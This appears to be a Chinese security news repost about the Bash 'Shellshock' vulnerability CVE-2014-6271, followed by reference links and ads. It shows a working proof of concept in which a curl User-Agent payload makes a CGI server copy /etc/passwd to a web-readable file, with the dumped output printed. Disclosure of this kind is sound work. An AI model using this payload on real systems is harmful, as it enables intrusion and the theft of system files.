Bash远程解析命令执行漏洞 CVE-2014-6271

技术 作者:站内编辑 2014-09-25 04:54:58 阅读:325
poc.cgi QQ截图20140925131200 $ curl -A ‘() { :; }; /bin/cat /etc/passwd > dumped_file’ http://192.168.0.1/poc.cgi
< !DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
 
500 Internal Server Error 
 

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@localhost and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.


Apache/2.2.22 (Debian) Server at 192.168.0.1 Port 80
$ curl http://192.168.0.1/dumped_file
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
libuuid:x:100:101::/var/lib/libuuid:/bin/sh 
Debian-exim:x:101:103::/var/spool/exim4:/bin/false 
statd:x:102:65534::/var/lib/nfs:/bin/false 
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
来自:https://www.invisiblethreat.ca/2014/09/cve-2014-6271/ 相关链接: http://marc.info/?l=oss-security&m=141157106132018&w=2 http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ http://seclists.org/oss-sec/2014/q3/650 http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNKRufIZWN http://pastebin.com/8NRv7s1Z http://pastebin.com/kQ5ppEZD http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html http://permalink.gmane.org/gmane.comp.security.oss.general/13852?utm_source=twitterfeed&utm_medium=twitter PS:ModSecurity声称已经针对CVE-2014-6271完善了过滤规则。

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

选择AiDeep,让人工智能为你工作:http://www.aideep.com/
四季很好,只要有你,文娱排行榜:http://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

图库
关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接